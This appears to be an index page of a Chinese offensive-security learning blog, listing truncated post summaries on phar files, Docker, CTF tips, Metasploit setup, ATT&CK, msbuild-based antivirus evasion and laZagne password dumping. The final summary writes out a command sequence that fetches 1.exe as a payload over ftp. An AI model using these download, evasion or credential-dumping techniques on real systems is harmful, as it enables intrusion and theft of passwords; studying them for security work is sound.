摘要:
什么是phar 一个PHP程序往往是由多个文件组成的,如果能够集中为一个文件来分发和运行是很方便的。phar便应运而生。大概跟java的jar文件是差不多类似的。但是php的phar文件是可以由php本身进行处理的,不需要额外的工具来创建、提取。 phar文件的结构 stub phar 文件标识,格 阅读全文
摘要:
什么是DockerDocker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的 Linux或Windows 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。现在越来越多的环境搭建都使用的是Docker,因为它部署方便、安全、并且在Docker上有很多的镜像供大家下载。例如现在有很多的CTF的比赛的环境几乎都是用Do... 阅读全文
摘要:
fofa查询(GUI界面) 使用截图:   python的GUI界面是真的舒服啊。 原本还是想用Pyinstaller打包,但是打包之后一直是使用不了,如果有大佬知道怎么回事的话,望告知。 github地址 后记:写的实在是太烂了,希望师傅们能指点一下。 阅读全文
摘要:
总结一下自己在命令执行这一方面收获的一些小技巧Linux读取文件的一些命令cat 从第一行开始,显示文件的所有内容tac 从第最后一行开始,显示文件的所有内容(正好与cat相反)more 根据窗口大小,一页一页的实现文件内容less 和more类似,但是优点是是可以往前翻页和搜索字符head 只显示前几行tail 只显示后几行nl 类似于cat -n,显示时输出行号linux下的一... 阅读全文
摘要:
环境root运行ubuntu18.04腾讯云服务器控制面板上面所有的端口全部放行本机自带防火墙已拆拆墙是为了能msf接受到会话安装curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > ... 阅读全文
摘要:
最近准备学习一下关于ATT&CK的知识,这里面先来理解一下什么是ATT&CK(通过对ATT&CK的学习,可以很快的对安全领域有一个比较全面的认识)。什么是MITREMITRE是一个非盈利的公司,他管理联邦政府资助的研发中心。大名鼎鼎的CVE(漏洞数据库)就是MITRE维护的。ATT&CKATT&CK是一个攻击者策略知识库,作为一个知识库肯定全面的总结了相关领域的攻击手法以及例子。ATT&CK矩阵图... 阅读全文
摘要:
easy calc这次的比赛自己一题都没有做出来,赛后看题解的时候很难受,其实有很多东西自己其实是可以做出来的,但是思路被限制了,可能这就是菜吧。首先web题目就是一个easy calc,emmmmmmm。想一想当初De1CTF2019的那道计算器。脑子头大.但是这一题是没有那么难。首先打开网页是一个简单的提交页面。这里面是提交到calc.php这个文件中,这里面有一个坑,就是要想看到源码,必须... 阅读全文
摘要:
免杀学习之使用msbuild来执行payload什么是msbuildmsbuild是Microsoft和Visual Studio的生成系统,简单地说,这个就是用来编译你的项目,也就是所谓的编译器。MSBuild可在未安装Visual Studio的环境中编译.net的工程文件,MSBuild可可以编译特定格式的xml文件。总结来说msbuild可以编译执行csharp代码。存储路径加载32位的s... 阅读全文
摘要:
使用laZagne来抓取密码什么是laZagne呢,它是一个Pythono编写的一个很强大的密码抓取工具,有名的工具比如mimikatz,但是只能限于windwos情况下进行抓取,并且对于免杀方面的工作还要我们自己来做(但是msf等后渗透工具已经集成了,相对说利用较为方便)。相对于laZagne来说就要差一点,因为它不仅支持跨平台,又因为使用python进行编译的,免杀的效果就相对于mimikat... 阅读全文
摘要:
利用ftp来下载payload文件echo open 192.168.1.1 21> ftp.txtecho ftp>> ftp.txtecho bin >> ftp.txtecho ftp>> ftp.txtecho GET 1.exe >> ftp.txtftp -s:ftp.txt后记:这个我没有实验成功太菜了利用vbs来下载payloadSet Post = CreateObject("M... 阅读全文